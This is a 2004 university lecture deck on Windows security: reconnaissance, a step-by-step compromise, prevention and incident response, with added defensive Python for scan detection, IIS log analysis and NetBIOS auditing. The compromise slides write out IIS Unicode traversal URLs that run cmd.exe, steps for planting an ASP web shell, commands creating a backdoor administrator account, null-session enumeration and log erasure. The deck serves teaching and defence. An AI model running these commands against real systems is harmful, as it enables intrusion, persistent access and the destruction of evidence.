Windows Security Analysis

Slide 1
Windows Security Analysis
Computer Science E-Commerce Security ‘2004’
Matthew Cook
http://escarpment.net/
Slide 2
Introduction
Senior IT Security Specialist
Loughborough University
http://www.lboro.ac.uk/computing/
Slide 3
Windows Security Analysis
• Introduction
• Step-by-step Machine Compromise
• Preventing Attack
• Incident Response
• Further Reading

Slide 4
Introduction
Basic Security Overview
Slide 5
Physical Security
• Secure Location
• BIOS restrictions
• Password Protection
• Boot Devices
• Case Locks
• Case Panels

Slide 6
Security Threats
• Denial of Service
• Theft of information
• Modification
• Fabrication (Spoofing or Masquerading)

Slide 7
Security Threats…
Why a compromise can occur:
• Physical Security Holes
• Software Security Holes
• Incompatible Usage Security Holes
• Social Engineering
• Complacency

Slide 8
The Easiest Security Improvement
Good passwords
• Usernames and passwords are the primary security defence
• Use a password that is easy to type, to avoid ‘shoulder surfers’
• Use the first letters from song titles, song lyrics or film quotations

Slide 9
Step-by-step Machine Compromise
Why, where, how?
Slide 10
Background
Reasons for Attack:
• Personal Issues
• Political Statement
• Financial Gain (Theft of money, information)
• Learning Experience
• DoS (Denial of Service)
• Support for Illegal Activity

Slide 11
Gathering Information
• Companies House
• Internet Search
  URL: http://www.google.co.uk
• Whois
  URL: http://www.netsol.com/cgi-bin/whois/whois
  A Whois query can provide:
  – The Registrant
  – The Domain Names Registered
  – The Administrative, Technical and Billing Contact
  – Record updated and created date stamps
  – DNS Servers for the Domain

Slide 12
Gathering Information…

Use Nslookup or dig:
  dig @<dns server> <machine address>
Different query types available:
  – A – Network address
  – Any – All or any information available
  – Mx – Mail exchange records
  – Soa – Start of Authority
  – Hinfo – Host information
  – Axfr – Zone transfer
  – Txt – Additional strings

Slide 13
Identifying System Weakness
Many products available:
• Nmap
• Nessus
• Pwdump
• L0pht Crack
• Null Authentication

Slide 14
Nmap
• Port scanning tool
• Stealth scanning, OS fingerprinting
• Open source
• Runs under Unix-based OSes
• Win32 port in development
• URL: http://www.insecure.org/nmap/

Slide 15
Nmap
Slide 16
Nessus
• Remote security scanner
• Very comprehensive
• Frequently updated modules
• Testing of DoS attacks
• Open source
• Win32 and Java client
• URL: http://nessus.org/

Slide 17
pwdump
• Version 3 (e = encrypted)
• Developed by Phil Staubs and Erik Hjelmstad
• Based on pwdump and pwdump2
• URL: http://www.ebiz-tech.com/html/pwdump.html
• Needs administrative privileges
• Extracts hashes even if syskey is installed
• Extracts from remote machines
• Identifies accounts with no password
• Self-contained utility

Slide 18
L0pht Crack
• Password auditing and recovery
• Crack passwords from many sources
• Registration $249
• URL: http://www.atstake.com/research/lc3/

Slide 19
L0pht Crack
Crack passwords from:
• Local Machine
• Remote Machine
• SAM File
• SMB Sniffer
• PWDump file

Slide 20
Nmap Analysis
• nmap -sP 158.125.0.0/16
  – Ping scan!
• nmap -sS 158.125.0.0/16
  – Stealth scan

Slide 21
Nmap Analysis…
TCP Connect Scan
• Completes a ‘Three Way Handshake’
• Very noisy (Detection by IDS)

Slide 22
Nmap Analysis…
TCP SYN Scan
• Half open scanning (Full TCP port connection not made)
• Less noisy than the TCP Connect Scan

Slide 23
Nmap Analysis…
TCP FIN Scan
  – FIN packet sent to target port
  – RST returned for all closed ports
  – Mostly works on UNIX-based TCP/IP stacks
TCP Xmas Tree Scan
  – Sends a FIN, URG and PUSH packet
  – RST returned for all closed ports
TCP Null Scan
  – Turns off all flags
  – RST returned for all closed ports
UDP Scan
  – UDP packet sent to target port
  – “ICMP Port Unreachable” for closed ports

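As an added example (not from the original slides), the Python below turns the flag definitions of slides 21 to 23 into detection logic: it classifies each flow by the flags the source sent (no flags = Null, FIN alone = FIN, FIN+URG+PSH = Xmas, SYN without the completing ACK = half-open SYN scan, SYN followed by ACK = connect scan) and then reports any source that probed many ports on one host with the same pattern, which is how an IDS distinguishes a sweep from ordinary clients. The flow records, addresses and the five-port threshold are constructed assumptions; a real sensor would build the per-flow flag set from packet captures or firewall logs.

```python
"""Classify nmap-style probes by TCP flag pattern and flag port sweeps.

Added example for the scan types on slides 21 to 23 (not from the talk).
Input is a constructed, flow-level summary of the kind a firewall or IDS
sensor can produce: for each (src, dst, proto, dst_port) the set of TCP
flags the *source* sent during the flow.
"""
from collections import defaultdict

# Flow-level records: (src_ip, dst_ip, proto, dst_port, flags_sent_by_src).
# Constructed sample; the addresses are documentation ranges, not real hosts.
SAMPLE_FLOWS = [
    # One source hitting seven ports with SYN and never sending the final
    # ACK: the half-open pattern of nmap -sS on slide 22.
    ("192.0.2.10", "198.51.100.7", "tcp", 21, frozenset({"SYN", "RST"})),
    ("192.0.2.10", "198.51.100.7", "tcp", 22, frozenset({"SYN", "RST"})),
    ("192.0.2.10", "198.51.100.7", "tcp", 25, frozenset({"SYN"})),
    ("192.0.2.10", "198.51.100.7", "tcp", 80, frozenset({"SYN", "RST"})),
    ("192.0.2.10", "198.51.100.7", "tcp", 135, frozenset({"SYN"})),
    ("192.0.2.10", "198.51.100.7", "tcp", 139, frozenset({"SYN", "RST"})),
    ("192.0.2.10", "198.51.100.7", "tcp", 445, frozenset({"SYN", "RST"})),
    # A single Xmas-tree probe (FIN+URG+PSH) from the same source.
    ("192.0.2.10", "198.51.100.7", "tcp", 80, frozenset({"FIN", "URG", "PSH"})),
    # A legitimate web client: full handshake, so SYN and ACK both seen.
    ("192.0.2.20", "198.51.100.7", "tcp", 80, frozenset({"SYN", "ACK", "PSH", "FIN"})),
    # A DNS lookup: ordinary UDP traffic also lands in the "udp" class.
    ("192.0.2.20", "198.51.100.53", "udp", 53, frozenset()),
]


def classify_flow(proto, flags):
    """Map a flow's source-sent flags to the scan type it is consistent with.

    Definitions follow the slides: Null = no flags, FIN = FIN alone,
    Xmas = FIN+URG+PSH, SYN = SYN without the ACK that would complete the
    three-way handshake, connect = SYN followed by ACK (full handshake, the
    noisy variant). UDP probes look like any other datagram at this level,
    so they only become meaningful when counted per source.
    """
    if proto == "udp":
        return "udp"
    flags = frozenset(flags)
    if not flags:
        return "null"
    if flags == {"FIN"}:
        return "fin"
    if flags == {"FIN", "URG", "PSH"}:
        return "xmas"
    if "SYN" in flags:
        return "connect" if "ACK" in flags else "syn"
    return "other"


def detect_sweeps(flows, min_ports=5):
    """Return {(src, dst, scan_type): sorted ports} for sources that probed
    at least min_ports distinct ports on one host with the same scan type.

    The threshold separates clients from sweeps: a browser opens a few
    ports per host, a scan touches many. The result is a plain dict so the
    caller can hand it to alerting.
    """
    touched = defaultdict(set)
    for src, dst, proto, dport, flags in flows:
        touched[(src, dst, classify_flow(proto, flags))].add(dport)
    return {key: sorted(ports) for key, ports in touched.items()
            if len(ports) >= min_ports}


if __name__ == "__main__":
    for (src, dst, kind), ports in detect_sweeps(SAMPLE_FLOWS).items():
        print(f"{src} -> {dst}: {kind} scan of {len(ports)} ports {ports}")
```

The single Xmas probe in the sample stays below the threshold, which is the trade-off of any count-based rule: a slow scan spread over hours needs a longer aggregation window, and a FIN/Xmas/Null probe against a Windows stack draws an RST on open ports as well, so those classes say more about the scanner's intent than about what it learned.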
Slide 24
Null Authentication
Null Authentication:
• Net use \\camford\IPC$ "" /u:""
• Famous tools like ‘Red Button’
• Net view \\camford
• List of users, groups and shares
• Last logged on date
• Last password change
• Much more…

Slide 25
Exploiting the Security Hole
Using IIS Unicode/Directory Traversal:
• /scripts/../../winnt/system32/cmd.exe /c+dir
• /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
  – Displays the listing of c: in browser
• Copy cmd.exe to /scripts/root.exe
• Echo upload.asp
  – GET /scripts/root.exe /c+echo+[blah]>upload.asp
• Upload cmdasp.asp using upload.asp
Still vulnerable on 24% of E-Commerce servers

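As an added example (not part of the original talk), this Python script shows the defender's side of the requests above: it reads IIS W3C extended log lines, folds the overlong UTF-8 sequences the exploit relies on (%c0%af for '/', %c1%9c for '\'), and flags requests that escape the web root or name cmd.exe. The log lines are constructed, the field list is taken from the #Fields header as IIS 5 writes it, and the depth model treats the virtual root as '/', which is an assumption rather than IIS's real directory mapping.

```python
"""Flag IIS Unicode / directory-traversal requests in W3C extended logs.

Added example for the IIS exploit on this slide (and the Nimda worm later
in the talk); not part of the original talk. The log lines below are
constructed in the IIS 5 W3C format, with the field list taken from the
#Fields header as IIS writes it.
"""
from urllib.parse import unquote_to_bytes

# Constructed sample log (IIS W3C extended format, remaining fields omitted).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2004-03-01 10:15:20 192.0.2.20 GET /default.asp - 200
2004-03-01 10:15:22 192.0.2.10 GET /scripts/../../winnt/system32/cmd.exe /c+dir 404
2004-03-01 10:15:23 192.0.2.10 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
2004-03-01 10:15:30 192.0.2.10 GET /scripts/root.exe /c+dir 200
"""


def decode_overlong(stem):
    """Percent-decode a URI stem and fold overlong two-byte UTF-8 sequences.

    Lead bytes 0xC0 and 0xC1 are never valid UTF-8 (the value fits in one
    byte), so %c0%af is an overlong encoding of '/' and %c1%9c of '\\'.
    A decoder that accepts them is what the exploit relies on; here the
    same folding is done only so the path can be inspected afterwards.
    Returns (decoded_text, saw_overlong).
    """
    raw = unquote_to_bytes(stem)
    out, overlong, i = [], False, 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            overlong = True
            i += 2
        else:
            out.append(chr(b) if b < 0x80 else "?")
            i += 1
    return "".join(out), overlong


def escapes_root(path):
    """True if '..' segments take the path above the virtual root '/'."""
    depth = 0
    for seg in path.replace("\\", "/").split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False


def inspect_request(stem):
    """Return the sorted list of findings for one cs-uri-stem."""
    decoded, overlong = decode_overlong(stem)
    findings = []
    if overlong:
        findings.append("overlong-utf8")
    if escapes_root(decoded):
        findings.append("traversal")
    if "cmd.exe" in decoded.lower():
        findings.append("cmd.exe")
    return sorted(findings)


def analyze_log(text):
    """Parse W3C lines using the #Fields header; return suspicious entries.

    The HTTP status is kept so responders can rank a 200 (the request was
    served) above a 404 (IIS rejected the plain '..' form).
    """
    fields, hits = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        row = dict(zip(fields, line.split()))
        findings = inspect_request(row.get("cs-uri-stem", ""))
        if findings:
            hits.append({"client": row.get("c-ip"), "uri": row.get("cs-uri-stem"),
                         "status": int(row.get("sc-status", 0)),
                         "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in analyze_log(SAMPLE_LOG):
        print(hit)
```

The fourth sample line, a request to the renamed interpreter /scripts/root.exe, is deliberately not flagged: once cmd.exe has been copied under a new name, name matching no longer catches it, so pair this check with file-integrity monitoring of the scripts directory. The single decode pass also misses double-encoded variants such as %255c, which need a second pass, and since the audit-trail slide later notes that intruders erase IIS logs, the lines have to be shipped off the host before they are analysed.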
Slide 26
Gaining ‘Root’
• Cmdasp.asp provides a cmd shell in the SYSTEM context
• Increase in privileges is now simple

• ISAPI.dll – RevertToSelf (Horovitz)
• Version 2 coded by Foundstone
• http://camford/scripts/idq.dll?
• Patch Bulletin: MS01-26
• NOT included in Windows 2000 SP2

Slide 27
Backdoor Access
• Create several user accounts
  – Net user iisservice <pass> /ADD
  – Net localgroup administrators iisservice /ADD
• Add root shells on high end ports
• Tiri is 3Kb in size
• Add backdoors to ‘Run’ registry keys

Slide 28
System Alteration
• Web page alteration
• Information Theft
• Enable services
• Add VNC

Creating a Warez Server
• Net start msftpsvc
• Check access
• Upload file 1Mb in size
• Advertise as a warez server

Slide 29
Audit Trail Removal
• Many machines have auditing disabled
• Main problems are IIS logs
• DoS IIS before logs sync to disc
• Erase logs from hard disc
• Erasing Eventlog harder

IDS Systems
• Network Monitoring at firewall

Slide 30
Preventing Attack
How to stop the attack from happening and how to limit the damage from crackers!
Slide 31
NetBIOS/SMB Services
• NetBIOS Browsing Request [UDP 137]
• NetBIOS Browsing Response [UDP 138]
• NetBIOS Communications [TCP 135]
• CIFS [TCP 139, TCP 445, UDP 445]
• Port 445 Windows 2000 only
• Block ports at firewall
• Check what is listening with netstat -a

Slide 32
NetBIOS/SMB Services…
To disable NetBIOS:
1. Select ‘Disable NetBIOS’ in the WINS tab of advanced TCP/IP properties.
2. Deselect ‘File and Print sharing’ in the advanced settings of the ‘Network and Dialup connections’ window.
Slide 33
NetBIOS/SMB Services…
Disable Null Authentication
• HKLM\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous
  – REG_DWORD set to 0, 1 or 2!
• HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\RestrictAnonymous
  – REG_DWORD set to 0 or 1

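As an added example covering both the NetBIOS/SMB port list of the previous slides and the RestrictAnonymous keys on this one (not from the original talk), the Python below audits a host from two text artefacts an administrator can collect and review offline: the output of netstat -a and a .reg export of the Lsa and SecurePipeServers keys. Both inputs are constructed samples; the port table follows the slide, the meanings of the three LSA values are the documented Windows 2000 semantics, and the audit treats a missing LSA value as 0, which is an assumption stated in the code.

```python
"""Audit a Windows host for NetBIOS/SMB exposure and null-session settings.

Added example for the NetBIOS/SMB and RestrictAnonymous slides; not from
the original talk. It parses two text inputs an administrator can collect
offline: the output of `netstat -a` and a .reg export of the two keys the
slide names. Both inputs below are constructed samples.
"""
import re

# Ports from the NetBIOS/SMB slide, keyed by (protocol, port).
NETBIOS_SMB_PORTS = {
    ("udp", 137): "NetBIOS browsing request",
    ("udp", 138): "NetBIOS browsing response",
    ("tcp", 135): "NetBIOS communications",
    ("tcp", 139): "CIFS",
    ("tcp", 445): "CIFS (Windows 2000)",
    ("udp", 445): "CIFS (Windows 2000)",
}

# Meaning of the LSA RestrictAnonymous values on Windows 2000.
RESTRICT_ANONYMOUS = {
    0: "null sessions may enumerate users, groups and shares",
    1: "null sessions cannot enumerate SAM accounts and names",
    2: "no access without explicit anonymous permissions",
}

# Constructed `netstat -a` output in the Windows 2000 layout (IPv4 only;
# the regex below does not handle IPv6 [::]:port forms).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1025         0.0.0.0:0              LISTENING
  TCP    198.51.100.7:139       192.0.2.10:1066        ESTABLISHED
  UDP    0.0.0.0:137            *:*
  UDP    198.51.100.7:138       *:*
"""

# Constructed .reg export; regedit writes HKEY_LOCAL_MACHINE, not HKLM.
SAMPLE_REG = """\
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa]
"RestrictAnonymous"=dword:00000000

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurePipeServers]
"RestrictAnonymous"=dword:00000001
"""

NETSTAT_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+\S+(?:\s+(\S+))?\s*$")


def exposed_listeners(netstat_text):
    """Return [(proto, local_ip, port, service)] for NetBIOS/SMB listeners
    reachable from the network, i.e. anything not bound to loopback.

    TCP entries count only in LISTENING state; UDP sockets have no state.
    """
    found = []
    for line in netstat_text.splitlines():
        m = NETSTAT_RE.match(line)
        if not m:
            continue
        proto, ip, port, state = m.group(1).lower(), m.group(2), int(m.group(3)), m.group(4)
        if proto == "tcp" and state != "LISTENING":
            continue
        if ip.startswith("127."):
            continue
        service = NETBIOS_SMB_PORTS.get((proto, port))
        if service:
            found.append((proto, ip, port, service))
    return found


def restrict_anonymous_values(reg_text):
    """Return {key_path: int} for every RestrictAnonymous dword in a .reg export."""
    values, current = {}, None
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
        elif current and line.lower().startswith('"restrictanonymous"=dword:'):
            values[current] = int(line.split("dword:")[1], 16)
    return values


def audit(netstat_text, reg_text):
    """Combine both checks into a list of human-readable findings."""
    findings = []
    for proto, ip, port, service in exposed_listeners(netstat_text):
        findings.append(f"{proto.upper()} {port} ({service}) listening on {ip}: "
                        "block at firewall or disable NetBIOS")
    values = restrict_anonymous_values(reg_text)
    # Assumption: an absent LSA value behaves like 0 (the Windows default).
    lsa = next((v for k, v in values.items() if k.lower().endswith("\\control\\lsa")), None)
    if lsa is None:
        findings.append("LSA RestrictAnonymous not set: treated as 0, " + RESTRICT_ANONYMOUS[0])
    elif lsa < 2:
        findings.append(f"LSA RestrictAnonymous={lsa}: {RESTRICT_ANONYMOUS[lsa]}")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_NETSTAT, SAMPLE_REG):
        print(finding)
```

On the sample the audit reports four network-reachable NetBIOS/SMB listeners plus the unset LSA value; the ESTABLISHED session on TCP 139 is skipped because the check is about what the host offers, not who is currently connected. Value 2 is the strongest LSA setting, but Microsoft's own guidance warned that it can break browsing and down-level clients, so test it in a development environment first, as the patching slides recommend.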
Slide 34
Operating System Patching
• Operating Systems do contain bugs, and patches are a common method of distributing these fixes.
• A patch or hot fix usually contains a fix for one discovered bug.
• Service packs contain multiple patches or hotfixes.

Slide 35
Operating System Patching…
• Only install patches after you have tested them in a development environment.
• Only install patches obtained direct from the vendor.
• Install security patches as soon as possible after release.
• Install feature patches as and when needed.
• Automate patch collection and installation as much as possible (QChain).

Slide 36
Operating System Patching…
Use automated patching technology:
• SUS – Microsoft Software Update Service
• SMS – Microsoft Systems Management Server
• Ghost – Symantec imaging software
And other application deployment software:
• Lights out distribution
• Deferred installation

Slide 37
IPSec
• IP security
• Linux connectivity using FreeS/WAN
• Mainly for wireless use
• WEP encryption cracked
• URL: http://www.freeswan.org/
• URL: http://airsnort.sourceforge.net/

Slide 38
Well Known Worms
• Nimda
  – Directory Traversal (Unicode Exploit)
• Slammer
  – MS SQL Server transaction control
• Blaster
  – MS Port 135 DCOM vulnerabilities
• Sasser
  – MS Port 445 vulnerabilities

Slide 39
Incident Response
What to do when something does go wrong!
Slide 40
Incident Response…
Don’t Panic!
• Unplug the network
• Get a notebook
• Back up the system and keep the back-ups
• Restrict use of email
• Look for information
• Investigate the cause
• Request help and assistance

Slide 41
Incident Response…
• Important to return to service swiftly
  – Do not jeopardize security
  – If in doubt, re-build
  – Perform forensics on a backup
• Keep documentation and evidence
• Contact local CERT if investigation proves non-worm/script-kiddie activity

Slide 42
Further Reading
• Garfinkel, S. Web Security & Commerce. O’Reilly [ISBN 1-56592-269-7]
• Hassler, V. Security Fundamentals for E-Commerce. Artech House [ISBN 1-58053-108-3]
• Huth, M. R. A. Secure Communicating Systems. Cambridge University Press [ISBN 0-52180-731-X]
• Schneier, B. Secrets & Lies (Digital Security in a Networked World) [ISBN 0-47125-311-1]

Slide 43
Useful Books, Tools and URLs
• Securing Windows NT/2000 Servers for the Internet (Stefan Norberg)
• Incident Response (Kenneth R. van Wyk, Richard Forno)
• Hacking Exposed: Network Security Secrets & Solutions (Stuart McClure et al.)
• Hacking Exposed Windows 2000: Network Security Secrets and Solutions (Scambray)

Slide 44
Useful Books, Tools and URLs
• Microsoft Security Website
  http://www.microsoft.com/security/
• Computer Security Incident Response Team
  http://www.cert.org/csirts/csirt_faq.html
• JANET CERT
  http://www.ja.net/cert/
• Bugtraq Mailing List
  http://online.securityfocus.com/

Slide 45
Questions
Slides available at:
http://escarpment.net/